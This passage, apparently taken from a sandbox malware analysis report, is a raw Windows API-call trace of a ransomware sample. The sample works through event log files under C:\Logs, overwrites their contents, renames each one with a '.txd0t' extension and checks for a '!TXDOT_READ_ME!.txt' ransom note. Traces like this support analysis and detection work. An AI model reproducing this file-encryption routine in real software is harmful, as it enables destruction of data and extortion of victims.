hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.269] FlushFileBuffers (hFile=0x460) returned 1 [0089.273] GetProcessHeap () returned 0xe30000 [0089.273] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xed7f88 [0089.273] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" [0089.273] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned="Microsoft-Windows-Shell-Core%4ActionCenter.evtx" [0089.273] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.273] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.273] GetProcessHeap () returned 0xe30000 [0089.273] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.273] CloseHandle (hObject=0x460) returned 1 [0089.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.txd0t")) returned 1 [0089.274] SetEvent (hEvent=0x3f8) returned 1 [0089.274] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.277] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" [0089.277] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t" [0089.277] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t") returned 0 [0089.277] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", dwFileAttributes=0x80) returned 1 [0089.278] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.278] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.278] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.278] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.279] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.279] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.284] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.284] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.285] FlushFileBuffers (hFile=0x478) returned 1 [0089.298] GetProcessHeap () returned 0xe30000 [0089.298] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xed7f88 [0089.298] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" [0089.298] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned="Microsoft-Windows-SmbClient%4Connectivity.evtx" [0089.298] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.298] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.298] GetProcessHeap () returned 0xe30000 [0089.298] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.298] CloseHandle (hObject=0x478) returned 1 [0089.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.txd0t")) returned 1 [0089.299] SetEvent (hEvent=0x3f8) returned 1 [0089.299] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.300] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" [0089.300] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t" [0089.300] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t") returned 0 [0089.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.301] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.301] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.301] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.301] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.302] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.302] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.304] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.304] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.304] FlushFileBuffers (hFile=0x478) returned 1 [0089.408] GetProcessHeap () returned 0xe30000 [0089.408] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11a) returned 0xed7f88 [0089.408] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" [0089.408] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned="Microsoft-Windows-SMBClient%4Operational.evtx" [0089.408] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.408] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.408] GetProcessHeap () returned 0xe30000 [0089.408] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.408] CloseHandle (hObject=0x478) returned 1 [0089.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.txd0t")) returned 1 [0089.409] SetEvent (hEvent=0x3f8) returned 1 [0089.409] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.411] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" [0089.411] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t" [0089.411] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t") returned 0 [0089.412] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0089.412] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.412] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.412] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.412] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.413] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.413] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x11000, lpOverlapped=0x0) returned 1 [0089.418] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.418] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x11000, lpOverlapped=0x0) returned 1 [0089.418] FlushFileBuffers (hFile=0x474) returned 1 [0089.427] GetProcessHeap () returned 0xe30000 [0089.427] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x144) returned 0xed8d08 [0089.427] StrCpyW (in: psz1=0xed8d08, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" [0089.427] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" [0089.427] StrCpyW (in: psz1=0xed8d20, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.427] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.428] GetProcessHeap () returned 0xe30000 [0089.428] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed8d08 | out: hHeap=0xe30000) returned 1 [0089.428] CloseHandle (hObject=0x474) returned 1 [0089.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.txd0t")) returned 1 [0089.428] SetEvent (hEvent=0x3f8) returned 1 [0089.428] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.430] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" [0089.430] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t" [0089.430] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t") returned 0 [0089.430] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0089.431] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.431] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.431] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.431] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.432] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.432] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x11000, lpOverlapped=0x0) returned 1 [0089.435] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.435] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x11000, lpOverlapped=0x0) returned 1 [0089.435] FlushFileBuffers (hFile=0x474) returned 1 [0089.439] GetProcessHeap () returned 0xe30000 [0089.439] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14c) returned 0xed4530 [0089.439] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" [0089.439] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" [0089.439] StrCpyW (in: psz1=0xed4548, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.439] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.439] GetProcessHeap () returned 0xe30000 [0089.439] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0089.439] CloseHandle (hObject=0x474) returned 1 [0089.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.txd0t")) returned 1 [0089.440] SetEvent (hEvent=0x3f8) returned 1 [0089.440] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.443] StrCpyW (in: psz1=0x37ff430, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" [0089.443] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t" [0089.443] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t") returned 0 [0089.443] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.444] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.444] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.444] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.444] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.445] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.445] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff3f0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3f0*=0x11000, lpOverlapped=0x0) returned 1 [0089.447] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.447] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff3f4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3f4*=0x11000, lpOverlapped=0x0) returned 1 [0089.447] FlushFileBuffers (hFile=0x474) returned 1 [0089.450] GetProcessHeap () returned 0xe30000 [0089.450] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x158) returned 0xed4530 [0089.450] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" [0089.450] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" [0089.450] StrCpyW (in: psz1=0xed4548, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.450] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.451] GetProcessHeap () returned 0xe30000 [0089.452] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0089.452] CloseHandle (hObject=0x474) returned 1 [0089.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.txd0t")) returned 1 [0089.453] SetEvent (hEvent=0x3f8) returned 1 [0089.453] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.454] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" [0089.454] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t" [0089.454] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t") returned 0 [0089.454] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.454] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.454] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.454] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.454] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.456] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.456] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.458] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 